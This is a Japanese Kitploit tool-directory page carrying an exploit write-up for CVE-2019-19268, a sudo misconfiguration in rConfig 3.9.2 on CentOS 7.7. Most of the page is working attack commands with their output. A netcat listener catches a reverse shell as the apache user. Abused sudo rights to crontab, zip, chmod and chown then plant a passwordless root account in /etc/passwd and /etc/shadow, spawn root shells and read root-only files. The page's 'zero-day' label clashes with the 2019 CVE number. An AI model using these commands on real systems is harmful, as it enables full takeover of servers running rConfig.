Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-19268 — 新たに発見されたゼロデイ! | Kitploit
ツール/GitHubGitHub/thecybergeek/cve-2019-19268
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテストコマンド&コントロール設定ミス
GitHubthecybergeek/cve-2019-19268

CVE-2019-19268

新たに発見されたゼロデイ!

リポジトリを見る
34326年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-19268

影響を受けるバージョン: rConfig 3.9.2.

[説明]
設定ミスにより、rConfig v3.9.2 には複数の攻撃ベクトルが存在し、ローカルユーザーが sudo 経由で root コマンドを実行できるようになります。

[発見者]
dmw0ng - Discord: dmw0ng#4449
TheCyberGeek - Discord: TheCyberGeek#1892
Email: [email protected]

rConfig 3.9.2 の Sudo 設定では、apache ユーザーが /usr/bin/zip、/bin/chmod、/usr/bin/tail プログラムを root として実行できます。これは、CVE-2019-16662 および CVE-2019-16663 と組み合わせることで、リモートコード実行に利用できます。

これは、ユーザーによる不適切な設定が原因でシステム侵害につながる一連の脆弱性です。

[脆弱性タイプ]
安全でないパーミッション

OS: CentOS 7.7.1908 ソフトウェア: rConfig v3.9.2

設定ミスにより、rConfig v3.9.2 には複数の攻撃ベクトルが存在し、ローカルユーザーが sudo 経由で root コマンドを実行できるようになります。

Askar のエクスプロイトを使用:
https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ rConfig 3.9.2 上で apache ユーザーを取得します。

アクセス

root@kitploit:~
root@TheCyberGeek:~# nc -lvvp 4444
listening on [any] 4444 ...
192.168.230.22: inverse host lookup failed: Unknown host
connect to [10.10.11.3] from (UNKNOWN) [192.168.230.22] 60598
whoami
apache
id
uid=48(apache) gid=48(apache) groups=48(apache)

複数の攻撃ベクトルによるルート権限の取得:

apache ユーザーは Misconfigured 上で次のコマンドを実行できます:
(ALL) NOPASSWD: /usr/bin/crontab, /usr/bin/zip, /bin/chmod, /bin/chown, /usr/bin/whoami, /usr/bin/wc, /usr/bin/tail, /bin/rm

sudo /usr/bin/crontab:

root@kitploit:~
id
uid=48 gid=48(apache) groups=48(apache)
sudo /usr/bin/crontab -l | { cat; echo "* * * * * echo 'pwned:::0:99999:7:::' >> /etc/shadow"; } | sudo /usr/bin/crontab -
sudo /usr/bin/crontab -l | { cat; echo "* * * * * echo 'pwned:x:0:0:root:/root:/bin/bash' >> /etc/passwd"; } | sudo /usr/bin/crontab -
sudo /usr/bin/crontab -l
* * * * * echo 'pwned:::0:99999:7:::' >> /etc/shadow
* * * * * echo 'pwned:x:0:0:root:/root:/bin/bash' >> /etc/passwd
su pwned
id
uid=0(root) gid=0(root) groups=0(root)

sudo /usr/bin/zip:

root@kitploit:~
id
uid=48 gid=48(apache) groups=48(apache)
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 65%)
sudo rm $TF
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)

sudo /bin/chmod

root@kitploit:~
sudo /bin/chmod 777 /etc/shadow
sudo /bin/chmod 777 /etc/passwd
echo "pwned:::0:99999:7:::" >> /etc/shadow
echo "pwned:x:0:0:root:/root:/bin/bash" >> /etc/passwd
su pwned
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)

sudo /usr/bin/tail ファイル読み取り

root@kitploit:~
id
uid=48(apache) gid=48(apache) groups=48(apache)
ls -la /root/secret.txt
-rwx------ 1 root root 19 Nov 25 11:41 /root/secret.txt
cat /root/secret.txt

LFILE=/root/secret.txt
sudo tail -c1G "$LFILE"
I got the secret

sudo /bin/chown ファイル権限の変更

root@kitploit:~
ls -la /root/secret.txt
-rwx------ 1 root root 19 Nov 25 11:41 /root/secret.txt
sudo /bin/chown apache:apache /root/secret.txt
ls -la /root/secret.txt
-rwx------ 1 apache apache 19 Nov 25 11:41 /root/secret.txt
cat /root/secret.txt
I got the secret

これにより、rConfig がインストールされた任意の CentOS 7.7.1908 を完全に侵害できます。

ツールをダウンロード